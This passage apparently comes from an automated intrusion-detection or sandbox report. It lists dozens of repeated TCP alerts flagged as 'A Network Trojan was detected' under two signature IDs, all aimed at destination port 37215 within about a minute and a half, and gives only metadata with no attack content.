              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374726
              SID:2829579
              Source Port:38890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438524
              SID:2829579
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439108
              SID:2829579
              Source Port:38632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090072
              SID:2829579
              Source Port:38996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802577
              SID:2835222
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132872
              SID:2835222
              Source Port:45728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784265
              SID:2829579
              Source Port:39900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437902
              SID:2829579
              Source Port:37810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993880
              SID:2835222
              Source Port:33412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658332
              SID:2835222
              Source Port:48978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783683
              SID:2835222
              Source Port:38652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354155
              SID:2829579
              Source Port:45198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841937
              SID:2829579
              Source Port:37622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130183
              SID:2835222
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456330
              SID:2835222
              Source Port:51920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108860
              SID:2829579
              Source Port:45426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.300386
              SID:2835222
              Source Port:40390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488836
              SID:2829579
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088008
              SID:2835222
              Source Port:43332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911410
              SID:2835222
              Source Port:59416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404098
              SID:2829579
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196012
              SID:2829579
              Source Port:36118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073682
              SID:2829579
              Source Port:52002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271952
              SID:2835222
              Source Port:43884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672105
              SID:2829579
              Source Port:45160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993405
              SID:2829579
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421653
              SID:2835222
              Source Port:57718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321025
              SID:2835222
              Source Port:45876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298483
              SID:2835222
              Source Port:58180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694210
              SID:2835222
              Source Port:40900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421767
              SID:2829579
              Source Port:46252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989006
              SID:2829579
              Source Port:53418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505597
              SID:2829579
              Source Port:53496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569742
              SID:2835222
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378169
              SID:2829579
              Source Port:38862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783374
              SID:2835222
              Source Port:53046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136115
              SID:2829579
              Source Port:48920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675757
              SID:2835222
              Source Port:33922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834815
              SID:2829579
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725972
              SID:2829579
              Source Port:57874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670360
              SID:2829579
              Source Port:51272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885686
              SID:2829579
              Source Port:55954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454105
              SID:2829579
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843688
              SID:2829579
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129259
              SID:2829579
              Source Port:54116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155114
              SID:2835222
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568652
              SID:2835222
              Source Port:43016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510137
              SID:2835222
              Source Port:35422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256077
              SID:2835222
              Source Port:49348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415868
              SID:2829579
              Source Port:34870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631014
              SID:2835222
              Source Port:58780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868922
              SID:2835222
              Source Port:47578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237538
              SID:2835222
              Source Port:50056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168126
              SID:2829579
              Source Port:54958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546764
              SID:2835222
              Source Port:40950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257206
              SID:2829579
              Source Port:46502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303832
              SID:2829579
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076225
              SID:2829579
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214480
              SID:2829579
              Source Port:54224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502821
              SID:2835222
              Source Port:49898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222763
              SID:2835222
              Source Port:56472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.255789
              SID:2829579
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273662
              SID:2835222
              Source Port:50190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.566928
              SID:2829579
              Source Port:49354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041800
              SID:2835222
              Source Port:34136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227428
              SID:2829579
              Source Port:52396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993371
              SID:2835222
              Source Port:56366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024474
              SID:2835222
              Source Port:54398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192616
              SID:2829579
              Source Port:33452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213105
              SID:2829579
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611650
              SID:2835222
              Source Port:60984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221170
              SID:2835222
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096446
              SID:2835222
              Source Port:51424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248669
              SID:2829579
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127706
              SID:2829579
              Source Port:50470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246211
              SID:2829579
              Source Port:50688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991902
              SID:2829579
              Source Port:37958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221728
              SID:2829579
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197330
              SID:2835222
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240389
              SID:2829579
              Source Port:47044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320061
              SID:2829579
              Source Port:56954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634245
              SID:2835222
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937115
              SID:2829579
              Source Port:59450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349314
              SID:2835222
              Source Port:55912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757002
              SID:2835222
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525502
              SID:2829579
              Source Port:50888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707013
              SID:2829579
              Source Port:52388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888974
              SID:2835222
              Source Port:47862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087009
              SID:2835222
              Source Port:55162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169807
              SID:2829579
              Source Port:60908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871109
              SID:2835222
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016383
              SID:2829579
              Source Port:34576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553136
              SID:2829579
              Source Port:39786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402510
              SID:2835222
              Source Port:56604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157622
              SID:2835222
              Source Port:58786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153986
              SID:2835222
              Source Port:52820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.309609
              SID:2829579
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568100
              SID:2829579
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175155
              SID:2835222
              Source Port:40222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610658
              SID:2829579
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157714
              SID:2835222
              Source Port:60546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246254
              SID:2829579
              Source Port:35342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.375235
              SID:2835222
              Source Port:60384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195257
              SID:2835222
              Source Port:53198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458971
              SID:2829579
              Source Port:60702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633505
              SID:2835222
              Source Port:44774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169994
              SID:2835222
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420755
              SID:2835222
              Source Port:37826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279674
              SID:2829579
              Source Port:36802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417372
              SID:2829579
              Source Port:59934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976222
              SID:2829579
              Source Port:51520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093284
              SID:2829579
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.702518
              SID:2835222
              Source Port:34978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153291
              SID:2835222
              Source Port:36926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870478
              SID:2835222
              Source Port:34582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509189
              SID:2835222
              Source Port:41990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246734
              SID:2829579
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219077
              SID:2835222
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970476
              SID:2829579
              Source Port:40044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407647
              SID:2835222
              Source Port:36474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320461
              SID:2835222
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055445
              SID:2829579
              Source Port:45400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507978
              SID:2835222
              Source Port:34552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109838
              SID:2835222
              Source Port:44480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913772
              SID:2829579
              Source Port:50778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318675
              SID:2835222
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262409
              SID:2829579
              Source Port:58200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320575
              SID:2835222
              Source Port:54126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373011
              SID:2829579
              Source Port:46822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165990
              SID:2835222
              Source Port:51922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027495
              SID:2829579
              Source Port:42720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886773
              SID:2829579
              Source Port:48684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709713
              SID:2829579
              Source Port:43490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604543
              SID:2835222
              Source Port:50938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803959
              SID:2829579
              Source Port:46434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912299
              SID:2835222
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.844115
              SID:2829579
              Source Port:58554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565040
              SID:2835222
              Source Port:41212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888232
              SID:2829579
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170623
              SID:2829579
              Source Port:34762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678296
              SID:2835222
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750757
              SID:2829579
              Source Port:57096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252928
              SID:2835222
              Source Port:33904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039332
              SID:2829579
              Source Port:52392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248502
              SID:2829579
              Source Port:51130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173811
              SID:2835222
              Source Port:36000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309124
              SID:2835222
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658286
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371870
              SID:2829579
              Source Port:43984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243548
              SID:2829579
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110394
              SID:2835222
              Source Port:57754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523943
              SID:2829579
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408907
              SID:2835222
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457767
              SID:2835222
              Source Port:59356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087750
              SID:2835222
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655582
              SID:2835222
              Source Port:39000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404491
              SID:2835222
              Source Port:42914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400974
              SID:2835222
              Source Port:43812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306380
              SID:2835222
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996911
              SID:2835222
              Source Port:49668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475714
              SID:2829579
              Source Port:47838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213098
              SID:2829579
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841175
              SID:2829579
              Source Port:55134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025583
              SID:2829579
              Source Port:40600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416514
              SID:2835222
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044921
              SID:2829579
              Source Port:43782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569171
              SID:2835222
              Source Port:59560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416975
              SID:2835222
              Source Port:51988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784439
              SID:2835222
              Source Port:60540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913653
              SID:2835222
              Source Port:47432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191939
              SID:2829579
              Source Port:56796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658816
              SID:2835222
              Source Port:44638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992823
              SID:2835222
              Source Port:37306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269001
              SID:2829579
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477743
              SID:2829579
              Source Port:47222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453198
              SID:2829579
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572000
              SID:2829579
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254864
              SID:2835222
              Source Port:38680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549897
              SID:2835222
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.037930
              SID:2835222
              Source Port:44398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247515
              SID:2835222
              Source Port:37150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214315
              SID:2829579
              Source Port:46924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107070
              SID:2829579
              Source Port:53366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871241
              SID:2829579
              Source Port:50264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279737
              SID:2835222
              Source Port:55208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570422
              SID:2835222
              Source Port:37792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150879
              SID:2829579
              Source Port:44584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131175
              SID:2835222
              Source Port:59622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165626
              SID:2835222
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056344
              SID:2829579
              Source Port:34856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310428
              SID:2835222
              Source Port:58456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176426
              SID:2835222
              Source Port:47700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556226
              SID:2835222
              Source Port:40286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791547
              SID:2829579
              Source Port:40590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603585
              SID:2835222
              Source Port:45182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127523
              SID:2829579
              Source Port:42178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278149
              SID:2829579
              Source Port:50684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
